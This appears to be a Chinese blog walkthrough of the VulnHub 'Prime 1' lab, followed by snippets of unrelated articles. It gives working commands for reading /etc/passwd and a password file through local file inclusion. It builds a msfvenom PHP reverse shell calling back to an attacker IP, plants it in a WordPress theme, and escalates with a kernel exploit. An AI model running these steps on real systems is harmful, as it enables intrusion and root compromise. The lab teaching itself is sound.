prime_series_level-1靶场详解
环境搭建
官网https://www.vulnhub.com/entry/prime-1,358/
直接导入靶机
解题思路
arp-scan -l
确认靶机ip为192.168.236.136
也可以使用nmap扫网段
nmap -sn 192.168.236.0/24
使用nmap扫描靶机开放的端口
nmap -sS -T5 --min-rate 10000 192.168.236.136 -sC -p- (速度较快,内容少)我习惯性这个
nmap -A -sV -T4 -p- 192.168.236.136 内容较多,速度慢
开放了22和80端口
访问80端口,查看源码也没有任何信息
使用dirb扫描目录
当然还可以使用御剑,dirsearch等
dirb http://192.168.236.136/
访问一下http://192.168.236.136/dev和http://192.168.236.136/wordpress
访问wordpress
尝试过滤扫描dirb http://192.168.236.136 -X .txt,.php,zip
尝试访问这三个文件:index.php,image.php,secret.txt
提示说要找到location.txt才能进行下一步
使用wfuzz工具爆破传参数
wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.236.136/index.php?FUZZ
发现长度宽度都一样
使用wfuzz过滤出不同的值
wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt --hw 12 http://192.168.236.136/index.php?FUZZ
直接访问/index.php?file=location.txt
curl http://192.168.236.136/index.php?file=location.txt
提示显示:secrettier360是正确的参数,file只是过渡而已
尝试curl http://192.168.236.136/index.php?secrettier360=aaa
curl http://192.168.236.136/image.php?secrettier360=aaa试试
提示说找到了正确的参数
使用curl http://192.168.236.136/image.php?secrettier360=/etc/passwd读取敏感文件
后面提示说找password.txt,并且在/home/saket里面
刚才只扫到一个index.php和一个image.php所以这里只能利用image.php
使用curl http://192.168.236.136/image.php?secrettier360=/home/saket/password.txt
给了一串特殊字符follow_the_ippsec猜测是密码
尝试ssh登录:ssh -p 22 victor@192.168.236.136
ssh登录失败,尝试其他登录方式
使用前面扫描出来的wordpress登录试试
使用cmseek搜集web指纹信息
cmseek -u http://192.168.236.136/wordpress/
或者使用wpscan扫描wordpress
wpscan --url http://192.168.236.136/wordpress/ --enumerate u
显示只有一个用户victor
登录wordpress
登录成功
找后门上传点
利用msfMsfvenom命令总结大全中已有payload(php/meterpreter/reverse_tcp)生成shell.php。打开shell.php文件,将内容复制到secret.php中。
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.236.128 lport=7777 -o shell.php
-p选择相应payload
lhost=本地IP
lport=监听端口
-o 指定输出文件的位置
将secret.php文件上传成功后,使用msf见天模块(exploit/multi/handler),设置lhost和lport和payload(php/meterpreter/reverse_tcp),开启监听后,浏览器打开secret.php页面。
要和生成的payload对应一致
使用msfconsole
使用监听模块 use exploit/multi/handler
跟之前生成payload的对应 set payload php/meterpreter/reverse_tcp
设置自己ip set lhost 192.168.236.128
设置端口 set lport 7777
开始监听 run和exploit都可以
让网站触发这个php反弹shell
访问这个文件
wordpress文件都在这个路径下
http://192.168.236.136/wordpress/wp-content/themes/twentynineteen/secret.php
打开msfconsole查看漏洞数据库
使用searchsploit 16.04 Ubuntu查找
发现只有这个符合,并且给了提权脚本
在msf数据漏洞库下载45010.c的提权脚本
msf脚本数据库路径/usr/share/exploitdb/exploits/linux/local
将脚本copy下来,使用gcc编译
上传45010
upload /root/45010(本机文件) /tmp/45010(靶机root目录)
发现版本报错glibc的版本不对(glibc是linux系统中最底层的api,几乎其它任何运行库都会依赖于glibc)
两个方法,要么kali下载对应版本(主要是我kali刚刚更新) ,要么升级Ubuntu的glibc版本(本来就是渗透进去的)
我选择第三种方法,找一个以前版本的kali 2021,就可以解决了。
查看root下的root.txt文件得到flag
知识点:
1、扫描局域网内的网段主机
2、扫描端口获得运行的服务
3、扫描目录获得关键信息
4、本地文件包含漏洞LF刊
5、fuzz获得正确的参数
6、wordpress漏洞利用
7、msfvenom:生成反弹shell
8、Ubuntu内核漏洞提权
内网渗透思路框架图_内网渗透路线图-CSDN博客
相关文章:
prime_series_level-1靶场详解
环境搭建 官网https://www.vulnhub.com/entry/prime-1,358/ 直接导入靶机 解题思路 arp-scan -l 确认靶机ip为192.168.236.136 也可以使用nmap扫网段 nmap -sn 192.168.236.0/24 使用nmap扫描靶机开放的端口 nmap -sS -T5 --min-rate 10000 192.168.236.136 -sC -p- …...
)
LeetCode刷题笔记之二叉树(三)
一、寻找特定节点 1. 404【左叶子之和】 题目: 给定二叉树的根节点 root ,返回所有左叶子之和。代码: class Solution {public int sumOfLeftLeaves(TreeNode root) {//左叶子不止是最左边的叶子,而是二叉树中每个节点的左叶子…...
IBM在闪存系统集成实时恶意软件I/O检测功能
IBM在其最新一代FlashCore Modules(FCMs)固件中集成了使用机器学习进行实时勒索软件和其他攻击检测的功能。这些FCMs是专用于IBM FlashSystem 5000和Storwize阵列的闪存驱动器,采用U.2外形尺寸及NVMe接口。现有的第三代FCMs分别提供4.8、9.6、…...
bpmn-js中实现xml数据转为json数据
开发bpmn-js建模器,希望将bpmn数据格式转为json数据格式更加清晰的展示数据层次,以结果为导向分析需求,实现功能的思路有两种方式: 通过bpmn-js转化为JS数据对象,然后通过JS中提供的JSON模块转换为json数据将xml解析成dom对象,通过dom对象转化为json格式数据三方库这里主…...
(A,B,C,D,E,F,G))
HUAWEI Programming Contest 2024(AtCoder Beginner Contest 342)(A,B,C,D,E,F,G)
看不懂的英文,题意很难理解,这场还是有点难度的。 C需要处理,D是不太明显的dijikstra,E是线段树优化dp,F是个不好想的线段树,主席树应该也能做。 我觉得讲的很好的宝藏up主->B站视频讲解。之后会比较忙…...
解决Docker镜像中CentOS 8仓库问题
前言: 在yum执行过程中,持续遇到与CentOS 8上的’appstream’仓库元数据检索相关的错误。具体错误消息为:“错误:下载’appstream’仓库元数据失败:无法准备内部镜像列表:镜像列表中没有URL。” 问题分析&…...
顶顶通呼叫中心中间件-如何使处于机器人话术中的通话手动转接到坐席分机上讲解(mod_cti基于FreeSWITCH)
顶顶通呼叫中心中间件使用httpapi实现电话转接操作过程讲解(mod_cti基于FreeSWITCH) 需要了解呼叫中心中间件可以点以下链接了解顶顶通小孙 1、使用httpapi接口转接 一、打开web版的ccadmin并且找到接口测试 打开web-ccadmin并且登录,登录完成之后点击运维调试-再…...
HarmonyOS—使用数据模型和连接器
Serverless低代码开发平台是一个可视化的平台, 打通了HarmonyOS云侧与端侧能力,能够轻松实现HMS Core、AGC Serverless能力调用。其中,数据模型和连接器是两大主要元素。开发者在使用DevEco Studio的低代码功能进行开发时,可以使用…...
基于MQTT协议实现微服务架构事件总线
一、场景描述 昨天在博客《客户端订阅服务端事件的实现方法》中提出了利用websocket、服务端EventEmitter和客户端mitt实现客户端订阅服务端事件,大大简化了客户端对服务端数据实时响应的逻辑。上述方案适用于单服务节点的情形。 对于由服务集群支撑的微服务架构&…...
免费的Git图形界面工具sourceTree介绍
阅读本文同时请参阅-----代码库管理工具Git介绍 sourceTree是一款免费的Git图形界面工具,它简化了Git的使用过程,使得开发者可以更加方便地下载代码、更新代码、提交代码和处理冲突。下面我将详细介绍如何使用sourceTree进行这些操作。 1.下载和…...
【Appium UI自动化】pytest运行常见错误解决办法
通过Appium工具录制代码在pycharm上运行报错: 错误一: 1.提示 setup() 方法运行 error failed 解决办法:未创建 init __ 方法,创建一个空的__init.py文件就解决了。 原因: 错误二: 2.运行代码ÿ…...
IDEA如何开启Dashboard
普通的面板 Run Dashboard面板 修改配置文件 找到项目的.idea文件夹 点击编辑workspace.xml文件 添加下方代码 <component name"RunDashboard"><option name"ruleStates"><list><RuleState><option name"name" valu…...
【论文复现】——一种新的鲁棒三维点云平面拟合方法
目录 一、算法原理1、论文概述2、参考文献二、代码实现三、结果展示本文由CSDN点云侠原创,原文链接。如果你不是在点云侠的博客中看到该文章,那么此处便是不要脸的GPT爬虫。 一、算法原理 1、论文概述 针对三维点云中的异常值和粗差点对平面拟合精度产生的影响,文章提出一…...
【C语言】学生宿舍信息管理系统
目录 项目说明 1. 数据结构设计 2. 功能实现 3. 主菜单设计 4. 文件操作 5. 系统使用 项目展示 1.主菜单功能界面 编辑 2.添加信息 3.查询信息 4.修改信息 5.删除信息 6.退出程序 项目完整代码 结语 在这篇博客中,我们将探讨如何使用C语言来开发…...
用Python插入页码到PDF文档
页码是许多类型文件中的重要内容,它能方便读者在文档中的导航。在创建PDF文档时,添加页码对于组织和引用内容特别有用。在本文中,我们将探讨如何利用Python程序高效地插入页码到PDF文档中,简化工作流程并创建出精美、结构合理的PD…...
LabVIEW光偏振态转换及检测仿真系统
LabVIEW光偏振态转换及检测仿真系统 随着光学技术的发展,光偏振态的研究与应用越来越广泛。为了深入理解光的偏振现象,开发了一套基于LabVIEW的光偏振态转换及检测仿真系统。该系统不仅能够模拟线偏振光、圆偏振光、椭圆偏振光等不同偏振态的产生与转换…...
scp 本地机和远程机传输文件的方法
在本地机器上,通过ssh连接到远程机器,如果想要在两个机器之间互相传输文件,那么可以使用scp。 scp运行的地方:本地机的终端 样例: 1 将本地文件filename1传输到远程主机的/home/username/filename2目录下 scp -r D:\…...
自定义神经网络二之模型训练推理
文章目录 前言模型概念模型是什么?模型参数有哪些神经网络参数案例 为什么要生成模型模型的大小什么是大模型 模型的训练和推理模型训练训练概念训练过程训练过程中的一些概念 模型推理推理概念推理过程 总结 前言 自定义神经网络一之Tensor和神经网络 通过上一篇…...
)
Java设计模式:单例模式之六种实现方式详解(二)
在Java中,单例模式是一种常见的设计模式,用于确保一个类只有一个实例,并提供一个全局访问点来获取该实例。单例模式在多种场景下都很有用,比如配置文件的读取、数据库连接池、线程池等。本文将详细介绍Java中实现单例模式的六种方…...
开创5G无线新应用:笙科电子5.8GHz 射频芯片
笙科电子(AMICCOM) 5.8GHz A5133射频芯片是一款专门设计用于在5.8GHz频率范围内(5725MHz - 5850MHz)进行射频信号处理的集成电路。这些集成电路通常包括各种功能模块,如射频前端、混合器、功率放大器、局部振荡器等,以支持无线通信系统的各种…...
从PCIE到SRIO:聊聊Xilinx 7系列GTX IP核里那些“看不见”的编码与对齐机制
从PCIE到SRIO:深入解析Xilinx 7系列GTX IP核的编码与对齐机制 在高速串行通信领域,Xilinx 7系列FPGA的GTX收发器IP核扮演着关键角色。当工程师面对PCIE或SRIO链路训练失败、误码率高等实际问题时,往往需要深入理解GTX内部的数据编码与对齐机制…...
Jetson Nano上MediaPipe GPU加速实战:从编译到部署,让你的AI应用帧率翻倍
Jetson Nano上MediaPipe GPU加速实战:从编译到部署,让你的AI应用帧率翻倍 在嵌入式AI领域,Jetson Nano凭借其出色的GPU性能成为众多开发者的首选平台。然而,当我们将Google的MediaPipe框架部署到这块开发板上时,默认的…...
如何在Linux上构建专业的Jellyfin媒体播放中心?
如何在Linux上构建专业的Jellyfin媒体播放中心? 【免费下载链接】tsukimi A simple third-party Jellyfin client for Linux 项目地址: https://gitcode.com/gh_mirrors/ts/tsukimi Tsukimi是一款专为Linux系统设计的第三方Jellyfin客户端,采用GT…...
嵌入式系统动态控制模型架构与实现解析
1. 嵌入式系统动态控制模型的核心架构解析在物联网和智能设备爆发的时代,嵌入式系统正面临前所未有的灵活性和可扩展性挑战。传统嵌入式系统的控制策略往往在设备出厂时就被固化,任何策略调整都需要重新烧录固件或更换硬件。这种刚性架构已经无法满足现代…...
Pixel Aurora Engine 3步入门教程:从零开始你的第一张AI创意图像
Pixel Aurora Engine 3步入门教程:从零开始你的第一张AI创意图像 1. 前言:为什么选择Pixel Aurora Engine? 如果你对AI图像生成感兴趣但不知道从何开始,Pixel Aurora Engine是个不错的起点。这个工具特别适合新手,界…...
C#怎么实现EF Core全局查询过滤 C#如何用HasQueryFilter配置全局过滤条件自动排除已删除数据【数据库】
创建最小权限账号需先CREATE USER再GRANT,strict模式下漏USAGE会报错1410;localhost仅匹配socket连接,TCP需用IP段;FLUSH PRIVILEGES非DCL必需;程序连接参数如multi_statements可能触发隐式权限检查失败。创建最小权限…...
)
从CMake到Autotools:一份给嵌入式开发者的ARM交叉编译‘生存手册’(附真实项目踩坑记录)
从CMake到Autotools:嵌入式开发者的ARM交叉编译实战指南 第一次接手嵌入式Linux项目时,面对代码仓库里混杂的CMakeLists.txt和configure.ac文件,我盯着屏幕发了半小时呆。作为一个刚从单片机开发转来的工程师,那些在x86平台上轻车…...
别再死记硬背!用Three.js十分钟搞懂透视投影与正交投影的区别
十分钟用Three.js实战理解透视与正交投影的本质区别 记得第一次接触3D开发时,我被各种投影矩阵公式折磨得头晕眼花。直到某天在Three.js里拖动相机参数滑块,看着实时变化的3D场景突然开窍——原来理解投影方式最有效的方式不是背诵公式,而是亲…...
告别玄学调参:用‘对齐’和‘均匀性’两个指标,手把手优化你的对比学习模型
对比学习调参实战:用对齐性和均匀性指标优化模型性能 在计算机视觉和自然语言处理领域,对比学习已经成为无监督表示学习的主流方法之一。SimCLR、MoCo等框架的成功应用证明了对比学习在提取高质量特征方面的强大能力。然而,许多工程师在实际应…...
2026.4.20)
力扣(python3自用)2026.4.20
最近没有刷力扣,罪过,主要是跑实验太累了,今天做了一道题437.路径总和iii给定一个二叉树的根节点 root ,和一个整数 targetSum ,求该二叉树里节点值之和等于 targetSum 的 路径 的数目。路径 不需要从根节点开始&#…...